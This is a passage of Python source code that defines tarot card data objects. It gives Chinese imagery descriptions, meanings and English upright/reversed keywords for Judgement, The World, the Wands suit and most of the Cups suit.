reversed='热情消退的、逐渐黯淡的、遭遇失败的、分离的、傲慢的、失去目标的、没有远景的、失去活力的、没有未来的、物质的贫乏、不快乐的人生阶段。' ), init=False) judgement: TarotCard = field(default=TarotCard( id=20, index='judgement', type='major_arcana', orig_name='Judgement (XX)', name='审判', intro='天使加百列(Gabriel)在空中居高临下吹号角,号角口处有七条放射状的线,象征七个音阶,能够将人类从物质世界的限制解放出来,并且疗愈人们的身心。\n\n喇叭绑着一张正方形红十字旗帜,象征业力的平衡。天使下方是个象征潜意识的海洋,在女祭司帘幕后面就曾出现过,如今已接近终点。海洋上漂浮着许多载着人的棺材,棺材象征物质世界的旧模式。棺材中人全都是灰色的,其中最显眼的是一位象征显意识的男性,含蓄地仰望天使;一位象征潜意识的女性伸出双手,大方迎接天使的呼唤;以及象征重生人格的小孩,背对着我们。远处则是白雪霭霭的高山,伟特说这是抽象思考的顶峰。', words='复活', desc='审判象征清晰的判断力。\n\n审判牌意指你对人生的老旧观念已经死亡,你正在接受内心的召唤,去过一种更有意义的生活。审判牌代表此时你有清晰的判断力。作为问题的答案,这牌暗示你拥有清晰的判断力。此时你理解了你由生命所展示的试炼及挑战中学习到了什么。\n\n审判牌也可能是在形容你了解你的精神目的,也知道要达成它的必要步骤。它代表你能清楚地看到自己,以及生命的时光。这会使你对如何开始又有何收获,产生莫大的喜悦或惊慌。收成十分就近了,你可以用你的正直和诚实来面对你的报偿。现在你审判你自己,如果你没有得到所希望的,实在也没有藉口可推诿了,因为你收割的正是你努力的产物。', upright='死而复生、调整心态重新来过、内心的觉醒、观念的翻新、超脱了束缚的、满意的结果、苦难的结束、重新检视过去而得到新的启发、一个新的开始、一段新的关系。', reversed='不公平的审判、无法度过考验的、旧事重演的、固执不改变的、自以为是的、对生命的看法狭隘的、后悔莫及的、自责的、不满意的结果、被击垮的。' ), init=False) the_world: TarotCard = field(default=TarotCard( id=21, index='the_world', type='major_arcana', orig_name='The World (XXI)', name='世界', intro='终于来到愚人旅程的终点。一位赤裸的舞者自由地在空中跳舞,她外貌看起来虽是女的,但在许多版本的塔罗牌中,她是雌雄同体,象征愚人终于成功将阴阳两股力量融合。\n\n舞者身体缠绕着象征高贵与神圣的紫色丝巾,象征神性其实就在每个人身上。舞者轻柔随意地手持两根权杖,象征进化与退化的力量,她同时具备两者。舞者身旁环绕着一个椭圆桂冠,桂冠象征成功,而它围绕成的椭圆形就像愚人的0号形状,愚人无限的潜力,在世界牌中发挥得淋漓尽致。桂冠上下各有一条红巾缠绕,形成倒8符号,象征无限与永恒,这在魔术师与力量牌都曾出现过。在图中四角有人、老鹰、狮子、牛,这些符号曾经在命运之轮出现过,牠们在命运之轮中还拿著书汲取知识,最后在世界牌中完成使命。', words='达成', desc='世界描述一种来自内心的快乐,它也可能暗示持久的成功。这是一张象征永久和持续成功的牌。你已经到达了成功之门的前方,成功女神让你耐心等待,她会让你进入成功之门的,只不过是时间问题罢了。成功之门周围是你经历过的幸福与哀伤,成功与失败,在到达乐土之前回忆一下过去的时光是很有必要的。这张牌暗示只要你拥有一颗感恩的心,就必能在你为自己打造的美丽世界中,寻找到幸福与快乐。\n\n牌的本意是“达成”,它告诉我们所有的事情都可以达成,所有的梦想都可以成为现实,没有不可能得到的事物。只要有耕耘,就能有相应的收获。', upright='完美的结局、重新开始的、生活上的完美境界、获得成功的、心理上的自由、完成成功的旅程、心灵的融合、自信十足带来成功、生活将有重大改变、获得完满的结果。', reversed='无法完美的、一段过往的结束、缺乏自尊的、感觉难受的、态度悲观的、丑恶的感情、无法挽回的局势、不完美的结局、无法再继续的、残缺的。' ), init=False) ace_of_wands: TarotCard = field(default=TarotCard( id=22, index='ace_of_wands', type='minor_arcana', orig_name='Ace of Wands', name='权杖首牌', intro='一只手从云中伸出,强而有力,握住一根长满绿叶的权杖。那根权杖是如此茂盛,以致鲜嫩的绿叶几乎从杖上“爆”开,有八片叶子脱离权杖,在空中飞舞。遍地青草溪流。远方的城堡似乎暗示着未来成功的可能。', words='行动', desc='权杖首牌暗示这是一个好的开始,放开手脚勇敢做。\n\n权杖首牌表示实践计划的能量和欲望。权杖首牌象征一个计划强而有力的开始,代表着手新计划的渴望、力量与勇气。这张牌推出已经开始的行动,而且一定会产生具体的结果,与纸上谈兵完全不同。首牌出现在采取行动的时候,他们不是代表任何的计划于决定,而是发动新事物的具体行为。', upright='Creation, Willpower, Inspiration, Desire, Creative spark, New initiative, New passion, Enthusiasm, Energy', reversed='Lack of energy, Lack of passion, Boredom, Delays, Blocks, Hesitancy, Creative blocks' ), init=False) two_of_wands: TarotCard = field(default=TarotCard( id=23, index='two_of_wands', type='minor_arcana', orig_name='Two of Wands', name='权杖二', intro='一位身穿领主服装的男子,站在他的城墙上,俯视他的辽阔领土,遥望远方海洋。他右手拿着一颗类似地球仪的球体,左手扶着一根权杖。右边的权杖则是被铁环系在墙上。城墙上有个白百合与红玫瑰交叉的图案,白百合象征纯洁的思想,红玫瑰象征热情,暗示两者之间必须取得平衡。', words='决定', desc='权杖二意味着一个决定。\n\n权杖二并不代表具体的行动,而是决定本身,通常是身体上的决定。行动是由权杖一所代表。在决定行动之前,权杖二代表对选择的评估,它是你所习惯的东西与你所想拥有的东西之间的一个抉择。\n\n权杖二暗示因成长而不满当前环境,需要决定未来行动方向的时机。他表示你目前所拥有的事实是不够的,你将决定下一步要怎么做。', upright='Planning, Making decisions, Leaving home, First steps, Leaving comfort, Taking risks', reversed='Fear of change, Playing safe, Bad planning, Overanalyzing, Not taking action, Playing it safe, Avoiding risk' ), init=False) three_of_wands: TarotCard = field(default=TarotCard( id=24, index='three_of_wands', type='minor_arcana', orig_name='Three of Wands', name='权杖三', intro='山巅上站着一个成功的商人,三根权杖笔直地竖立在地面上,商人右手握着其中一根,目送自己的贸易船出海。天空是鲜明的黄色,海映着天,也是黄色。', words='远见', desc='权杖三意味着面向远方,你的未来在你的眼光里。\n\n权杖三可以表示旅行或将计划付诸实行。可以代表当你寻求自我内在意义的时候,你仍可保持相对的沉静;表示你一边在扩展自身内在于外的新大道与利益,一边在维持一种平衡的状态。权杖三同时也暗示你正在考虑你最近的状况,并且寻找你内在与外在的意义。', upright='Looking ahead, Expansion, Rapid growth, Momentum, Confidence, Growth, Foresight', reversed='Obstacles, Delays, Frustration, Restriction, Limitations, Lack of progress' ), init=False) four_of_wands: TarotCard = field(default=TarotCard( id=25, index='four_of_wands', type='minor_arcana', orig_name='Four of Wands', name='权杖四', intro='四根巨大的权杖耸立在前方,其上挂着象征胜利的花环。两位女子手持花束高举头顶欢庆舞蹈着,远方隐约可见庆祝的人群,呈现一幅和谐且繁荣的景象。右边有护城河上有座桥,通往远方的表示稳固庄园城堡。', words='稳定', desc='权杖四意味着坚定牢固的合作。\n\n权杖四描出一个坚固的家庭或工作环境,欢乐与分享是每天生活的一部分。权杖四代表坚固,将权杖三中所决定的计划变得稳固或实在的行为。它经常暗示搬入新家或换工作,也表示你在目前的环境中安定下来。', upright='Community, Home, Celebration, Celebrations, Reunions, Parties, Gatherings, Stability, Belonging', reversed='Lack of support, Transience, Home conflicts, Instability, Feeling unwelcome, Lack of roots, Home conflict' ), init=False) five_of_wands: TarotCard = field(default=TarotCard( id=26, index='five_of_wands', type='minor_arcana', orig_name='Five of Wands', name='权杖五', intro='迥异于权杖四的和谐稳定局面,权杖五呈现一群年轻人混战的场面。每个人手上都拿着一根杖,彼此僵持不下,谁也不让谁。伟特说:这是一场模仿的战役。', words='冲突', desc='权杖五暗示缺乏和谐或者内在的冲突。\n\n权杖五是一张代表冲突的牌,虽然冲突不至于伤害任何人,但却是所有人全盘卷入。只是权杖类型的天性,总是把生活看成战争,因为如果没有障碍,就没有冒险了。而从另外一方面来看,这张牌比较可以形容成比较,较量,竞争。', upright='Competition, Rivalry, Conflict, Arguments, Aggression, Tension, Rivals, Clashes of ego', reversed='Avoiding conflict, Respecting differences. end of conflict, Cooperation, Agreements, Truces, Harmony, Peace' ), init=False) six_of_wands: TarotCard = field(default=TarotCard( id=27, index='six_of_wands', type='minor_arcana', orig_name='Six of Wands', name='权杖六', intro='一位年轻男子,戴着胜利的桂冠,骑着白马凯旋而归。四周都是围绕簇拥着他的群众。白色代表纯洁,马象征力量。红色的外衣象征积极主动与热忱。男子手持的权杖饰以胜利花环。艰辛奋斗已然过去,他现在抬头挺胸,享受属于他的荣耀时刻。', words='自信', desc='权杖六暗示着对人生充满自信的态度。\n\n在这张牌中,火的乐观主义使其欲求和期望得到成功。这不是错误的乐观主义或虚无的期待,而是来自过去的成功及自信的一种真正的信仰。权杖六也表示工作的升迁、证实达成目标,或仅是一种自信的生活态度。', upright='Victory, Success, Public reward, Triumph, Rewards, Recognition, Praise, Acclaim, Pride', reversed='Excess pride, Lack of recognition, Punishment, Failure, No rewards, Lack of achievement' ), init=False) seven_of_wands: TarotCard = field(default=TarotCard( id=28, index='seven_of_wands', type='minor_arcana', orig_name='Seven of Wands', name='权杖七', intro='绿衣男子站在青葱的山顶上,手持权杖,奋力迎击敌人从山下攻上的六根权杖。他高举右手,表情坚毅。', words='挑战', desc='权杖七暗示经由坚韧不拔而获得的成功。\n\n权杖七表示你需要更大的挑战。权杖七的讯息是“不要放弃”。继续努力前进,你将得到成功的回报。你投注于完成目标的体力与行动,将是值得的。', upright='Perseverance, Defensive, Maintaining control, Protectiveness, Standing up for yourself, Defending yourself, Protecting territory', reversed='Give up, Destroyed confidence, Overwhelmed, Giving up, Admitting defeat, Yielding, Lack of self belief, Surrender' ), init=False) eight_of_wands: TarotCard = field(default=TarotCard( id=29, index='eight_of_wands', type='minor_arcana', orig_name='Eight of Wands', name='权杖八', intro='八根权杖整齐划一的在空中航行,背景是蔚蓝的天空与青翠的山丘平原,还有一条宁静的小溪流过。', words='自由', desc='权杖八意味旅行及自由流动的能量。\n\n权杖八代表了海外旅行、自由流动的能量,以及达成目标的清晰路径。过去的努力就是在为现在的人生可以自由的旅行而铺路。权杖八表示你的目标清楚可见,而且正轻松的向它们迈进。这点可以从八根权杖自由而无约束的掠过天际看出来。权杖八没有拘束的本性反映了这是很少阻碍的时机。它表示你是自由的、可投注热情、直接追求目标。', upright='Rapid action, Movement, Quick decisions, Speed, Progress, Sudden changes, Excitement', reversed='Panic, Waiting, Slowdown, Slowness, Chaos, Delays, Losing momentum, Hastiness, Being unprepared' ), init=False) nine_of_wands: TarotCard = field(default=TarotCard( id=30, index='nine_of_wands', type='minor_arcana', orig_name='Nine of Wands', name='权杖九', intro='一个壮汉靠着长杖,似乎在等待着什么。他的头上扎绷带,显示他在过去战役中曾经受伤,尚未复原。但他并不畏惧,仍然紧锣密鼓等待着敌人的下一波来袭。他身后竖立八根权杖,井井有条,像是栅栏,包围着壮汉所守护的家园。', words='谨慎', desc='权杖九暗示重新评估目前承诺的时候。\n\n对于既存的问题纵是期待将来能够解决,现在这个人开始回顾过去的作为,以便看清他是怎么走到今天的。他已经渐渐知道所有行为都会产生结果,就好比他目前的生活就是过去作为的结果,而将来的生活则是由现在的决定和作为来引导的。\n\n这张牌代表逐渐意识到聚焦于承诺和目的是多么重要的事了。与其栽种五百颗混合的种子来期待有好的结果,不如仔细评估只耕耘一种特殊的品种,并且悉心照料它们,以享受耕耘后的收获。', upright='Resilience, Grit, Last stand, Persistence, Perseverance, Close to success, Fatigue', reversed='Exhaustion, Fatigue, Questioning motivations, Stubbornness, Rigidity, Defensiveness, Refusing compromise, Giving up' ), init=False) ten_of_wands: TarotCard = field(default=TarotCard( id=31, index='ten_of_wands', type='minor_arcana', orig_name='Ten of Wands', name='权杖十', intro='一个男人奋力的扛着十根沉重的权杖,朝着远方的房子前进。他被权杖的重量压得喘不过气,疲累万分,但他仍不愿放弃,为了生活,一步一脚印的往前走。', words='责任', desc='权杖十暗示一个委任某些责任的时机。\n\n权杖十描绘暗示一个委任某些责任的时机。他被这些权杖给压的沉下去,而且它们也遮住了他的方向(即远方的房子)。他急切地想要涉入这么多的情况当中,结果,因为种种承诺和问题而不胜负荷。权杖十通常伴随着一种态度:“如果你想妥适的完成它,你就要自己做。你觉得身负重任,所以不能去信任别人也能完成这件工作。\n\n尽管负担重重,然而权杖十代表你在付出极大努力后所获得的成功。或许你会因为交付出去某些责任而受惠,因为那会减轻你的压力,并且用时间去深思长期以来的憧憬。当你实现目标时。你有充分的理由为你的成就感到骄傲,因为权杖是证实了,要梦想成真就需要坚持和努力。', upright='Accomplishment, Responsibility, Burden, Duty, Stress, Obligation, Burning out, Struggles', reversed='Inability to delegate, Overstressed, Burnt out, Failure to delegate, Shouldering too much responsibility, Collapse, Breakdown' ), init=False) page_of_wands: TarotCard = field(default=TarotCard( id=32, index='page_of_wands', type='minor_arcana', orig_name='Page of Wands', name='权杖侍从', intro='权杖侍从把权杖拄在地上,好奇地看着杖顶,好像在研究什么东西。他的服装是明亮的鲜黄色,外衣上有权杖家族图腾火蜥蜴,有些蜥蜴的嘴没有真正咬到尾巴,形成不完整循环,但有些却有。牌的背景是沙漠和三个金字塔。', words='开始', desc='权杖侍从象征新的挑战,新的消息,跃跃欲试的梦想。\n\n权杖侍从意指该是开始某些新事物的时候了。它是展开一项新方案或旅行(如果有其他旅行牌出现在牌局中)的行动,且将指引你一个新方向。权杖侍从牌描述当开始一项新的事业时,一种可以感觉到年轻活力的行动。虽然对于行动会感到紧张,但是他仍然充满激情和热心,热衷于探索有用的经验以及展开新的冒险。', upright='Exploration, Excitement, Freedom, Adventure, Fresh ideas, Cheerfulness, Energetic, Fearless, Extroverted', reversed='Lack of direction, Procrastination, Creating conflict, Hasty, Impatient, Lacking ideas, Tantrums, Laziness, Boring, Unreliable, Distracted' ), init=False) knight_of_wands: TarotCard = field(default=TarotCard( id=33, index='knight_of_wands', type='minor_arcana', orig_name='Knight of Wands', name='权杖骑士', intro='权杖骑士骑着健马,高举权杖,表情自信地看着远方。他穿着明亮黄色服装,上面同样有权杖的家族象征火蜥蜴,但蜥蜴的嘴没有触碰到尾巴,形成一个不完整的循环。骑士的头盔顶端和背後都饰着红色的长穗,还戴着红手套,他以左手拉着缰绳,健马的前蹄高高举起。远方背景中出现三座金字塔,金字塔呈现在马脚的下方。', words='改变', desc='权杖骑士象征充满活力,信心满满的迎接改变。\n\n充满活力,信心满满的迎接改变。权杖骑士所代表的是火元素当中的火元素。这张牌可以象征行动、旅行、改变以及为了自身缘故的活动。看得出来权杖骑士正在思考未来的行动,骑士正全神贯注于对向往目标的积极追求。这张牌经常代表一种态度——完成某件事情唯一的办法就是自己动手做。瞄一眼这张牌就会得到火、活动、热情及活力的印象。权杖骑士暗示需要挑战、爱好旅游和学习,并有教学的能力。', upright='Action, Adventure, Fearlessness, Courageous, Energetic, Charming, Hero, Rebellious, Hot tempered, Free spirit', reversed='Anger, Impulsiveness, Recklessness, Arrogant, Reckless, Impatient, Lack of self control, Passive, Volatile, Domineering' ), init=False) queen_of_wands: TarotCard = field(default=TarotCard( id=34, index='queen_of_wands', type='minor_arcana', orig_name='Queen of Wands', name='权杖皇后', intro='权杖皇后戴着盛开绿叶的王冠,穿着阳光般金黄服饰,坐在宝座上。她的体态强健。她的左手拿着一朵向日葵,她的右手持权杖,眼光向左望。宝座的扶手是两只狮子,后面悬吊的帷幕上,再度出现火象的狮子图腾和向日葵。她前方有一只黑猫守护,这里的黑猫似乎也在保护权杖皇后,使她免于受伤害。远方有三座金字塔,天空则是一片既明亮又祥和的浅蓝色。', words='决心', desc='权杖皇后代表心灵的强大,透过内在力量而达到成功。\n\n权杖皇后牌可以说是透过内在的力量和自信而获得成功的。当你面对逆境时勇气会帮助你达成目标。相信你所做的事,以及做你所相信的事,可以帮助你了解你的目标。', upright='Courage, Determination, Joy, Confident, Self-assured, Passionate, Determined, Social, Charismatic, Vivacious, Optimistic', reversed='Selfishness, Jealousy, Insecurities, Demanding, Vengeful, Low confidence, Jealous, Selfish, Temperamental, Bully' ), init=False) king_of_wands: TarotCard = field(default=TarotCard( id=35, index='king_of_wands', type='minor_arcana', orig_name='King of Wands', name='权杖国王', intro='权杖国王坐在宝座上,身躯稍微向前倾,好像随时准备出发。他右手持权杖,杖上长有新鲜的绿叶。宝座和披风饰以狮子和火蜥蜴,地上还有一只火蜥蜴陪伴着他。', words='稳重', desc='权张国王代表经由自律而成功。\n\n权杖国王代表热忱坚定,魄力十足,经由自律而成功。他为人诚实、积极而坦率,而且经常愿意接受新挑战。他认为过程比结果还重要,而且拒绝任何拖泥带水的挑战。权杖国王描绘一个强壮的人,能够透过他的意志力来领导及统御别人。他对自己有坚强的信念,因为他的信心是建立在自身的经验上。他知道他的方法有效,因为他尝试过也试验过这种方法。自律可以让你超越自己,因此逆就会有充分的时间和体力来掌握更好的机会,让你完成已着手之事。', upright='Big picture, Leader, Overcoming challenges, Leadership, Vision, Taking control, Daring decisions, Boldness, Optimism', reversed='Impulsive, Overbearing, Unachievable expectations, Forceful, Domineering, Tyrant, Vicious, Powerless, Ineffective, Weak leader' ), init=False) ace_of_cups: TarotCard = field(default=TarotCard( id=36, index='ace_of_cups', type='minor_arcana', orig_name='Ace of Cups', name='圣杯首牌', intro='圣杯首牌是所有小牌的一号牌中最富象征意义的。图中的圣杯就是耶稣在最后晚餐中使用的杯子,杯上有个倒立的M字母。据说,在耶稣死后,他的鲜血就是由这个圣杯所承装着。\n\n白鸽是天主教中圣灵的象征,牠衔着象征耶稣身体的圣饼,自上而下彷佛要进入杯中。杯中有五道水涌出,下方的水面平静,只有少许涟漪,睡莲处处,睡莲茎长,向上伸展至水面。二十五滴水珠从四面落下,飘浮在空中。一只手从云中伸出,这只手和权杖一与宝剑一中的手截然不同,它是轻轻的捧着圣杯,而非用力抓住圣杯。', words='情感', desc='圣杯首牌意味情感的连接和满足。\n\n圣杯首牌正位是人际关系最好的开始,经常代表新感情的开端,对于人际关系是非常好的征兆。相对于权张首牌所代表的肉体上、体力上的开始,它暗示你已打开心扉接受新机会。它可能是一段新的两性关系,或既存关系的新阶段,或一种新层次的满足。此时正是你感觉情感满足的时刻。首牌描述的是透过感情和生活产生连接。你可能正经验着正立首牌的满足感或满意感。或许你正展开一项你全心期待的计划,或是一次旅行。', upright='New feelings, Spirituality, Intuition, Love, Emotional awakening, Creativity', reversed='Emotional loss, Blocked creativity, Emptiness, Coldness, Feeling unloved, Gloominess' ), init=False) two_of_cups: TarotCard = field(default=TarotCard( id=37, index='two_of_cups', type='minor_arcana', orig_name='Two of Cups', name='圣杯二', intro='一男一女面对彼此,向对方持杯致意。两人头上都戴着花环,男人身躯微微向前,左脚踏出,右手也伸向女人,而女人站姿端凝如山。他们中间浮着一根两条蛇缠绕的杖,称为“赫米斯之杖”,是治疗的象征。杖上的狮子头象征沟通,而两片翅膀象征圣灵,使人联想到恋人牌中的天使。远方是一座城镇。', words='平等', desc='圣杯二意指一种平等的伙伴关系或两性关系。\n\n圣杯二意指一种心灵上的契合。它形容一种既丰富又有创意的友谊或两性关系。其实,圣杯二讲的就是这两种力量的结合,若能同时拥有两种力量,且融合良好的话,会比单一力量更强大。当牌局中出现此牌时,它意味着连结你和对方的特质,那么你可能会获得某些比你单打独斗的成就还要来得大的东西。', upright='Unity, Partnership, Connection, Attraction, Close bonds, Joining forces, Mutual respect', reversed='Imbalance, Broken communication, Tension, Separation, Rejection, Division, Bad communication, Withdrawal' ), init=False) three_of_cups: TarotCard = field(default=TarotCard( id=38, index='three_of_cups', type='minor_arcana', orig_name='Three of Cups', name='圣杯三', intro='三个女子紧靠彼此,围成圆圈,高举圣杯互相庆贺。她们头上都戴着象征丰收的花圈,穿着色彩艳丽的袍子,脸上幸福洋溢。四周有藤蔓、葫芦及南瓜,一位女子手上提着一串葡萄,这些植物很容易让人联想到丰收的时节。这三位女子分别有不同颜色的头发与眼珠,穿戴的衣服花环也都各有不同,代表她们都是独立的个体,有独立的个性,但是,在这个团体中,她们都能尊重彼此,敬爱彼此。三人围成圆圈的型态,表示她们之间没有尊卑之分,在这个欢庆的场合里,每个人都是如此平等。', words='团聚', desc='圣杯三意味庆贺或重聚。\n\n圣杯三意指欢乐、分享或庆贺。圣杯三是一张代表庆祝、团圆或当所有参与者带来欢乐的一场聚会。这杖牌可一暗示由三人或更多的人来分享成功。圣杯三意味着一段庆祝的时光,一群志同道合的人们相聚,或代表这是个重大隆盛的晚宴。\n\n圣杯三也经常代表欢庆的场合,举凡各种宴会、聚餐、婚礼、弥月、尾牙、庆功宴等都算在内。其丰收的涵义表示事情有了好的结果,不管过程曾经有多艰辛。因此,圣杯三象征丰收的时节,长久的辛苦终于开花结果,获得成功。', upright='Friendship, Community, Happiness, Gatherings, Celebrations, Group events, Social events', reversed='Overindulgence, Gossip, Isolation, Scandal, Excess, Loneliness, Solitude, Imbalanced social life' ), init=False) four_of_cups: TarotCard = field(default=TarotCard( id=39, index='four_of_cups', type='minor_arcana', orig_name='Four of Cups', name='圣杯四', intro='一个男人百无聊赖地坐在树下,双眼紧闭,双手双脚合在一起,形成防御的姿态。他前方三个杯子象征他过去的经验。云中伸出一只手给他第四个杯子,他却视而不见,独自沉浸在自己的世界中。', words='不满', desc='圣杯四暗示要留意目前感情上的机会。\n\n圣杯四在告诉我们,应该睁开我们的双眼,在那些机会自眼前溜走之前好好的把握住它们。当你内心感到越充实时,你对外在的需求则越少。你越深思熟虑或将焦点放到内心,你就需要越稳定的基础(或与土地有更强的连结)来平衡你自己。\n\n这张牌带有一种沉闷及不悦的感觉,可能是求问者的生活日日如是,一成不变。其实生活未如想像般单调乏味的,只要求问者肯开阔视野,有些意料不到的事情便会发生。', upright='Apathy, Contemplation, Disconnectedness, Feeling disconnected, Melancholy, Boredom, Indifference, Discontent', reversed='Sudden awareness, Choosing happiness, Acceptance, Clarity, Awareness, Depression, Negativity' ), init=False) five_of_cups: TarotCard = field(default=TarotCard( id=40, index='five_of_cups', type='minor_arcana', orig_name='Five of Cups', name='圣杯五', intro='在灰暗的天空底下,有一个人身着黑色斗篷,低头哀悼地上三个倾倒的杯子,里头五颜六色的酒流了出来。他的前方是一条河,象征悲伤之流,但河上有座象征意识与决心的桥,通往远处的房子。灰暗的天色反映牌中人的沮丧的内心世界。从图面上无法分辨出这人是男是女,显示悲伤的情绪无论男女皆能体验。', words='悲观', desc='圣杯五代表在痛苦中回转身,寻找新的机会。\n\n圣杯五形容失落和悲伤。它可能是张代表分离的牌,或者有种和人生疏离的感觉。这段期间内,那些平稳而熟悉的事物似乎都逃离你了。在新机会现身前,你必须经历这段失落或孤立期。这张牌和所有的“五”(包括隐士牌)一样,在正立时都代表心胸窄狭,而倒立时,则有心胸宽大的意味。', upright='Loss, Grief, Self-pity, Disappointment, Sadness, Mourning, Discontent, Feeling let down', reversed='Acceptance, Moving on, Finding peace, Contentment, Seeing positives' ), init=False) six_of_cups: TarotCard = field(default=TarotCard( id=41, index='six_of_cups', type='minor_arcana', orig_name='Six of Cups', name='圣杯六', intro='在一座宁静安详的庄园里,有六个盛装星币花朵的圣杯。一个小男孩捧着圣杯,似乎在嗅着花香,又好像把圣杯献给小女孩。背景充斥代表快乐的鲜黄色,而天气晴和。让人彷佛有置身童话世界的感受。', words='安全', desc='圣杯六代表童真环境下的保障和安全。\n\n圣杯六描绘的是一种温柔而隐秘的情景,其中有某种程度的保障和安全,它带有一种可预知性。保障和安全倍受珍惜,不过这是以极高的代价换来的。因为没有什么冒险,所以通常没什么成长。\n\n圣杯六暗示以成长为代价而得到保障、安全和亲密。它可以意指你的居家或家庭状态的稳定。也可能是过去的事物或人们又出现了,等着你去处理。他也可以代表一种舒适的状态,让你有时间静下来,重新关注活力或安顿下来。', upright='Familiarity, Happy memories, Healing, Nostalgia, Memories, Comfort, Sentimentality, Pleasure', reversed='Moving forward, Leaving home, Independence, Stuck in past' ), init=False) seven_of_cups: TarotCard = field(default=TarotCard( id=42, index='seven_of_cups', type='minor_arcana', orig_name='Seven of Cups', name='圣杯七', intro='七个圣杯飘浮在云雾弥漫的半空中,杯中分别装着城堡(象征冒险)、珠宝(财富)、桂冠(胜利)、龙(恐惧,另一说是诱惑)、人头、盖着布发光的人(自己)以及蛇(智慧,另一说是嫉妒)。请注意桂冠的下方有颗不显眼的骷髅头,成功与死亡并存,似乎在给人什么警惕。有个人面对着这些圣杯,不知该如何选择,他的身体姿态似乎流露出些微恐惧。', words='梦想', desc='圣杯七代表应该认知你内在需求。\n\n圣杯七代表的是生活中的非现实层面,包括我们的梦境、幻想与白日梦,或是偶而异想天开的点子。这种想像通常只是空中楼阁,一般人不会真的把这些幻想付诸行动,因此圣杯七不是一张代表行动的牌,而只是一种个人想像的心理状态而已。这张牌描述的是:该去想想什么是你生活重要的部分。它显示出检视环境来确认你正走在通往满足之路的过程中。圣杯七意味着深思内在生活,已进行精神或情感的回顾。\n\n圣杯七是一张代表自我发现、心灵成长以及认识内在需求的牌。提醒你,充分了解自己与自己的行动,你需要行动,也需要思考。对行动有所思考能帮助你将直接的经验转变为知识,并更向智慧与理解靠近。没有思考,行动很快就会变得重复,而没有行动与经验,思考则可能变的索然无味,且毫无意义。这张圣杯七代表你需要向内探索自己,以追求所有爱的来源。你应该确认你所真正需要的是什么,并发现什么东西足以添满你的感情。', upright='Searching for purpose, Choices, Daydreaming, Illusion, Fantasy, Wishful thinking, Indecision', reversed='Lack of purpose, Diversion, Confusion, Disarray, Distractions, Clarity, Making choices' ), init=False) eight_of_cups: TarotCard = field(default=TarotCard( id=43, index='eight_of_cups', type='minor_arcana', orig_name='Eight of Cups', name='圣杯八', intro='身穿红衣红鞋的男子在暮色中,手持长杖,离开他先前辛苦建立的的八个杯子,越过河川,转身而去。四周沼泽密布,象征淤塞的情感,如同一滩死水。', words='突破', desc='圣杯八意味你已经突破某种状况,并显示你要追寻更多的东西。\n\n这张牌代表为了追寻一种新的满足,而放弃既有的满足方式。或许你正打算离职去找一个更有价值的工作,或者你正从你的爱的关系中撤退去寻找更深层的幸福。\n\n圣杯八意味着你正超越某人,或突破某特定状况。它表示一个人光理解还不够,还包括离开一种稳定的状态(圣杯六),去发现圣杯十所提供的满足感。没有任何人事物强迫你放弃目前的状态,除了你内心想达到更强烈满足的需求。要圆满的挑战成功,需要内在的力量,当八出现时,你就会拥有相对的勇气和力量。在大阿尔克纳牌中,第八张是力量牌。而所有塔罗牌的八也都和力量有关。', upright='Walking away, Disillusionment, Leaving behind, Abandonment, Letting go, Searching for truth', reversed='Avoidance, Fear of change, Fear of loss, Stagnation, Monotony, Accepting less, Staying in bad situation' ), init=False) nine_of_cups: TarotCard = field(default=TarotCard( id=44, index='nine_of_cups', type='minor_arcana', orig_name='Nine of Cups', name='圣杯九', intro='一个财主装扮的的男子坐在小凳上,双手抱胸,神情怡然自得。他身后的高桌上,覆盖蓝色桌布,九个圣杯排排站。背景则是一片光明的鲜黄色。', words='满足', desc='圣杯九意味对自己的满意和荣耀感。\n\n圣杯九的昵称叫做美梦成真,代表当事人的愿望极有可能实现,无论是精神或是物质方面。这张牌表示你了解自己真正的价值,而且就是你的价值造就了今天的你。\n\n圣杯九形容一种对能圆满达成工作而感到的骄傲和满足。你内心所拥有幸福和喜悦的感觉,可能是来自于你的工作环境、人际关系,或是来自一种心灵上的成就感。现在你内在的需求已经得到满足了,而你也能思考你所赢得的成功。在这张九牌当中有着从你对自己的爱里头所滋长出来的快乐、满足和平静。', upright='Satisfaction, Emotional stability, Luxury, Wishes coming true, Contentment, Success, Achievements, Recognition, Pleasure', reversed='Lack of inner joy, Smugness, Dissatisfaction, Unhappiness, Lack of fulfilment, Disappointment, Underachievement, Arrogance, Snobbery' ), init=False) ten_of_cups: TarotCard = field(default=TarotCard( id=45, index='ten_of_cups', type='minor_arcana', orig_name='Ten of Cups', name='圣杯十', intro='在卡面中我们看到一家四口和乐融融,父母亲搂抱对方,各举一只手迎向圣杯彩虹,两个孩子快乐的手牵手跳舞,背景是清翠的树木河流,和一栋房屋。', words='家庭', desc='圣杯十意味一个互利的团体或家庭状态。\n\n圣杯十是一张表示欢乐和分享的牌。它通常是在描述一个团队或家庭,他们在身体及精神上都能相互奉献及合作,并且共享所有的利益。圣杯十形容一个家庭或团体,而其中的每个人均能受益。因为每个人都坦然的付出和接受,因而团体的气氛和谐,大家也乐于付出。它暗示对家庭或工作环境(包括团队合作和分享)有所付出。这张是意味一个成功的家庭状态或聚合,其中每位参与者都充分的感受到对这个团体的归属感。', upright='Inner happiness, Fulfillment, Dreams coming true, Happiness, Homecomings, Emotional stability, Security, Domestic harmony', reversed='Shattered dreams, Broken family, Domestic disharmony, Unhappy home, Separation, Domestic conflict, Disharmony, Isolation​' ), init=False) page_of_cups: TarotCard = field(default=TarotCard( id=46, index='page_of_cups', type='minor_arcana', orig_name='Page of Cups', name='圣杯侍从', intro='圣杯侍从穿着花朵图案的衣服,身体很轻松地站着,左手叉腰,面带微笑,用好奇的眼光,没有任何压力地看着圣杯中蹦出的一条鱼。', words='奉献', desc='圣杯侍从意味有益于情感的奉献。\n\n圣杯侍从是想像力最丰富的孩子。他天真无邪,敏感细心,直觉性强,爱好幻想,好奇心重,甜美可人,喜欢作梦,常常问一些让人想都想不到的问题。他很随和,合作性高,可靠,关心别人的威受,也乐意为他人服务。这样的性格形成一位善解人意、敏感,多愁善感,强调感情交流互动的人。他认真对待他人,对於所爱的人更是忠诚。他也是一位勤勉好学和专心致志的人,自动自发地提供服务朝向特定目标努力,他热心助人,是值得信赖的好帮手,更是良好的工作伙伴。\n\n塔罗牌中的侍从牌都和学习有关,而且由于圣杯组牌涉及情感和直觉,所以这张牌可能意味着透过冥想,或其他任何类似的被动方式来进行心灵上的学习或发展。圣杯侍从代表一段新关系或圣以合伙关系的到来。一个让情感得到满足的机会。', upright='Happy surprise, Dreamer, Sensitivity, Idealism, Naivete, Innocence, Inner child, Head in the 